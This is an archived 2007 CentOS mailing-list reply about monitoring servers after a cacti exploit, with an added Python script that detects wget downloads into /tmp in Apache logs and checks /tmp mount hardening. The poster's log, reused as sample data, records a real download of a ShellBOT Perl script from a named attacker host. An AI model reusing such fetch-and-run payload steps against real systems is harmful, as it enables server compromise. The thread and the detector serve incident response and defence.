Re: Suggested way to remotely monitor servers and networks these days?




On Thu, 24 May 2007, Dexter Ang wrote:

Hi folks,

I'm just wondering what is the recommended way of monitoring servers and
networks remotely. My current setup is to install and configure cacti and
nagios. I've set these up to require SSL. This way, I can easily go to them
and login from wherever I am and monitor (almost) everything I need to
monitor.

You might want to look at hobbit. http://sourceforge.net/projects/hobbitmon/

I find it much easier to manage than nagios. Besides the UI looks nicer. :-)


The problem is that leaving cacti open was the most stupid thing I've done.
After checking /var/log/httpd/error_log, I saw that someone exploited a
cacti php file and the result was:

--08:13:11--  http://psaico.host.sk/desk.pl
         => `/tmp/desk.pl'
Resolving psaico.host.sk... 62.168.109.150
Connecting to psaico.host.sk|62.168.109.150|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,144 (20K) [text/x-perl]

  0K .......... .........                                  100%   28.26KB/s

08:13:13 (28.26 KB/s) - `/tmp/desk.pl' saved [20144/20144]

which immediately downloaded ShellBOT to /tmp and executed it. It was a good
thing I caught this as early as I did. So, what's everyone else's solution
these days? Or is it simply a matter of creating a /tmp partition and
mounting it noexec?

On a side note... anyone with experience with ShellBOT? From research, it
seems to attempt to connect to an IRC server upon running. So if my outgoing
connections are secured by iptables, can I assume it never got connected at
all? I'll probably try this out someday but just looking for a quick
experienced answer.

It does not matter if they connected or not. The bottom line is the machine was hacked and something got installed that does not belong there. There is no way at this point to be sure that they did not install something else or modify binaries to hide their tracks.

So now the only way to be sure there is not something in that machine is to reload
it. Anything less and you will never know for sure.

Regards,

--
Tom Diehl		tdiehl@xxxxxxxxxxxx		Spamtrap address mtd123@xxxxxxxxxxxx
_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
http://lists.centos.org/mailman/listinfo/centos
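The thread shows two things a defender wants to automate: spotting downloader output that lands in the web server's error_log (the wget transcript quoted above) and checking whether /tmp is actually mounted with hardening options. The script below is an added example written for this archive page, not code from either poster or from the CentOS project. It parses the wget progress format shown in the post, flags downloads saved into world-writable directories, and reads /proc/mounts-style text to report which of noexec/nosuid/nodev are missing on a mount. The log sample reuses the lines from the post; the surrounding Apache lines and the /proc/mounts snapshot are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed sample: the wget transcript from the post, wrapped in a couple of
# made-up Apache error_log lines so the parser has noise to skip.
SAMPLE_ERROR_LOG = """\
[Thu May 24 08:12:59 2007] [error] [client 192.0.2.10] File does not exist: /var/www/html/favicon.ico
--08:13:11--  http://psaico.host.sk/desk.pl
         => `/tmp/desk.pl'
Resolving psaico.host.sk... 62.168.109.150
Connecting to psaico.host.sk|62.168.109.150|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,144 (20K) [text/x-perl]

  0K .......... .........                                  100%   28.26KB/s

08:13:13 (28.26 KB/s) - `/tmp/desk.pl' saved [20144/20144]
[Thu May 24 08:14:02 2007] [notice] caught SIGTERM, shutting down
"""

# Constructed /proc/mounts snapshot: /tmp is a separate partition but lacks noexec.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext3 rw,relatime,data=ordered 0 0
/dev/sda3 /tmp ext3 rw,nosuid,nodev,relatime 0 0
proc /proc proc rw 0 0
"""

# Directories any local user (including the web server account) can write to.
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Patterns for the classic wget (1.10-era) progress output, as quoted in the post.
START_RE = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)\s*$")
DEST_RE = re.compile(r"^\s*=> `([^']+)'\s*$")
RESOLVE_RE = re.compile(r"^Resolving \S+?\.\.\. (\d{1,3}(?:\.\d{1,3}){3})")
SAVED_RE = re.compile(r"^(\d\d:\d\d:\d\d) .*- `([^']+)' saved \[(\d+)/(\d+)\]")


@dataclass
class DownloadEvent:
    """One wget transfer reconstructed from error_log."""
    started: str
    url: str
    dest: Optional[str] = None
    ip: Optional[str] = None
    size: Optional[int] = None
    finished: Optional[str] = None

    def is_suspicious(self) -> bool:
        # A web server process fetching files into a world-writable directory
        # is the pattern the poster saw; treat it as an indicator, not proof.
        return self.dest is not None and self.dest.startswith(WORLD_WRITABLE_DIRS)


def scan_error_log(text: str) -> List[DownloadEvent]:
    """Walk error_log text and reassemble each wget transcript into an event."""
    events: List[DownloadEvent] = []
    current: Optional[DownloadEvent] = None
    for line in text.splitlines():
        m = START_RE.match(line)
        if m:
            current = DownloadEvent(started=m.group(1), url=m.group(2))
            events.append(current)
            continue
        if current is None:
            continue  # ordinary Apache line, not part of a transcript
        m = DEST_RE.match(line)
        if m:
            current.dest = m.group(1)
            continue
        m = RESOLVE_RE.match(line)
        if m:
            current.ip = m.group(1)
            continue
        m = SAVED_RE.match(line)
        if m:
            current.finished, current.dest = m.group(1), m.group(2)
            current.size = int(m.group(3))
            current = None  # transcript complete
    return events


def missing_mount_hardening(proc_mounts: str, mountpoint: str,
                            wanted=("noexec", "nosuid", "nodev")) -> Optional[Set[str]]:
    """Return the hardening options absent on `mountpoint`, or None when it is
    not its own mount (it then inherits whatever its parent filesystem has)."""
    for line in proc_mounts.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] == mountpoint:
            return set(wanted) - set(fields[3].split(","))
    return None


if __name__ == "__main__":
    for ev in scan_error_log(SAMPLE_ERROR_LOG):
        flag = "SUSPICIOUS" if ev.is_suspicious() else "ok"
        print(f"{flag}: {ev.started}-{ev.finished} {ev.url} ({ev.ip}) -> {ev.dest} [{ev.size} bytes]")
    print("/tmp missing:", missing_mount_hardening(SAMPLE_MOUNTS, "/tmp"))
```

On a live box, feed `open("/var/log/httpd/error_log").read()` and `open("/proc/mounts").read()` to the two functions. Two caveats worth keeping in mind: the regexes cover the wget output style shown in the post, so curl or a newer wget needs its own patterns; and noexec on /tmp only blocks direct execution, whereas a script run as `perl /tmp/desk.pl` is read by the interpreter and runs regardless, which is why the reply above treats the host as compromised rather than relying on the mount option.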
